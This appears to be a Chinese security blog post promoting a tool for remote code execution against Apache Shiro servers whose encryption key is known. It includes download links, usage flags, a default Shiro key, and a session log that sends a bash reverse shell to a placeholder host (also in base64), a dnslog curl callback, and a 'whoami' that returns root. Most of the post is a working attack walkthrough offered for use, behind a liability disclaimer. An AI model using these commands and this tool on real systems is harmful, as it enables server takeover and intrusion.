Shiro有key无链的情况下的利用工具

ivi

NightCrawler TtTeam 2023-09-07 09:42 发表于广东

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号夜组安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

Shiro

01

前言

在攻防和渗透的时候经常遇到shrio有Key没链的情况，因为常规使用的那两款工具当检测到有Key没有利用链的时候还是无法进一步拿shell，所以说一下另一款工具。有Key没链可以尝试一下，但是能不能成功就看运气了。

这俩工具有key无链，常规链无法利用。

1. https://github.com/altEr1125/ShiroAttack2
   
2. https://github.com/SummerSec/ShiroAttack
   
3. https://github.com/wyzxxz/shiro_rce_tool

复制代码

02

其它链JRMPClient

shiro_tool这款工具可以检测其他不是常规的利用链，看一下这个shiro_tool，还挺多的

1. 
   
2. download_url：https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar
   
3. 
   
4. 优化一些功能：
   
5. 1、spring/tomcat回显，执行命令的时候，x=whoami 就行
   
6. 2、批量检测是否shiro
   
7. 3、目标服务器不出网的情况下探测
   
8. 4、key 目前 401 个。
   
9. 5、默认会加载当前目录下的 keys.txt 文件，可以把key放到keys.txt里，和该jar放同一个目录，会自动加载。
   
10. 
    
11. 
    
12. > java -jar shiro_tool.jar
    
13. Usage: java -jar shiro_tool.jar https://xx.xx.xx.xx
    
14. nocheck     --> skip check target is shiro or not.
    
15. skip        --> all gadget default can be use
    
16. redirect    --> follow redirect default:false
    
17. randomagent --> random useragent
    
18. notcheckall --> not check all gadget
    
19. useragent=  --> set useragent
    
20. cookiename= --> default: rememberMe      不是rememberMe的时候用
    
21. x=          --> print result
    
22. cmd=        --> set command to run
    
23. dcmd=       --> set command to run, command format base64 string
    
24. key=        --> set a shiro key
    
25. req=        --> request body file   request body file 抓包保存到文件里，这里写文件名
    
26. keys=       --> keys file       自定义key的文件，key按行分割，即每行写一个
    
27. java -cp shiro_tool.jar shiro.Check urls=批量url文件  redirect
    
28. java -cp shiro_tool.jar shiro.Check http://www.shiro.com
    
29. 
    
30. 
    
31. [admin@ shiro] java -jar shiro_tool.jar https://xx.xx.xx.xx/         
    
32. [-] target: https://xx.xx.xx.xx/
    
33. [-] target is use shiro
    
34. [-] start guess shiro key.
    
35. [-] shiro key: kPH+bIxk5D2deZiIxcaaaA==
    
36. [-] check URLDNS
    
37. [*] find: URLDNS can be use
    
38. [-] check CommonsBeanutils1
    
39. [*] find: CommonsBeanutils1 can be use
    
40. [-] check CommonsBeanutils2
    
41. [-] check CommonsCollections1
    
42. [-] check CommonsCollections2
    
43. [-] check CommonsCollections3
    
44. [-] check CommonsCollections4
    
45. [-] check CommonsCollections5
    
46. [-] check CommonsCollections6
    
47. [-] check CommonsCollections7
    
48. [-] check CommonsCollections8
    
49. [-] check CommonsCollections9
    
50. [-] check CommonsCollections10
    
51. [-] check CommonsCollectionsK1
    
52. [-] check CommonsCollectionsK2
    
53. [-] check CommonsCollectionsK3
    
54. [-] check CommonsCollectionsK4
    
55. [-] check Groovy1
    
56. [*] find: Groovy1 can be use
    
57. [-] check JSON1
    
58. [*] find: JSON1 can be use
    
59. [-] check Spring1
    
60. [*] find: Spring1 can be use
    
61. [-] check Spring2
    
62. [-] check JRMPClient
    
63. [*] find: JRMPClient can be use
    
64. [*] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener
    
65. 0: URLDNS
    
66. 1: CommonsBeanutils1
    
67. 2: Groovy1
    
68. 3: JSON1
    
69. 4: Spring1
    
70. 5: JRMPClient
    
71. [-] please enter the number(0-6)
    
72. 3
    
73. [-] use gadget: JSON1
    
74. [*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
    
75. [*] command example: curl dnslog.xx.com
    
76. [*] if need base64 command, input should startwith bash=/powershell=/python=/perl=
    
77. [-] please enter command, input q or quit to quit
    
78. > curl json.dnslog.xx.cn
    
79. [-] start process command: curl json.dnslog.xx.cn
    
80. [-] please enter command, input q or quit to quit
    
81. > bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
    
82. [-] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
    
83. [-] please enter command, input q or quit to quit
    
84. > output=on
    
85. [-] print payload mode on.
    
86. [-] please enter command, enter q or quit to quit, enter back to re-choose gadget
    
87. > whoami
    
88. kPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - zEC2T+ZP+ib2g+NLMrrU0LRsNu3lr7kjq
    
89. 82987eI8FZxA8ckaX8LsMNHdParxVS9aYg0Oxl91WD5GztG6Dmg/QO/sjxi+kX/sFpHgqwtG4MCQoogH
    
90. Jkhnj73PI6Wn8AJWQyXoOGNMkyboGcEm0Ti1h+WMGQEqw57tRl7Pjr0pMr2oZcUj9huwC/Lfr090FX7v
    
91. rPrU5JnQm2Qo7ZrMPnxENXs0yMT6HfU75OejeF6kXbWTaGlvfByscF1ljoDR/k2txdQ1eK4nZ4ReOAqM
    
92. uUeeaXwirEw2kg58GktvB2Ghw4egXJBQUdP3H8iE+zrkf12YlPs/RAOq8w0mWfvwB7EnCW3Z83YP8vV1
    
93. +reLT9oNyUpCfjKyQVodnpZJY7If4F9al8He7E832RR3mhFvsjJDyNFTbB4TPrRqFDehSVuHib5qkh0s
    
94. 0YjvCGErxDLH9pFS4G9rNYQeAnXBKeNzS5q2O0xCe5xg4X6l8R6XsU2/V1d6wd27U7u18+DJlo/v58vj
    
95. SyUtUaEAAuMN9C30Rr+r7Tk9MVC55eS8l82fURpUwttcRADhJ0esKHAFFAkwnisbAb4Uugz3IADojYlH
    
96. BNFtWFuV2dsuqkionEROKLIdVHJGR8URmk79v8lbLbpCWI3cTCf81SwwBoYylKXCyHX2X08VlEUvuHWk
    
97. ypx9gVvDuQQQFTGP4ljwpU1NlQPqxaLXmnZ5TyJN2sycL9s8VWMYls4uFATtMkpXXcwaQGFVjCzFrABv
    
98. [-] please enter command, enter q or quit to quit, enter back to re-choose gadget
    
99. > x=whoami
    
100. root
     
101. 
     
102. [-] please enter command, enter q or quit to quit, enter back to re-choose gadget
     
103. > quit
     
104. [-] start process command: quit
     
105. [-] quit

复制代码

03

工具下载

https://github.com/altEr1125/ShiroAttack2

https://github.com/SummerSec/ShiroAttack

https://github.com/wyzxxz/shiro_rce_tool

https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar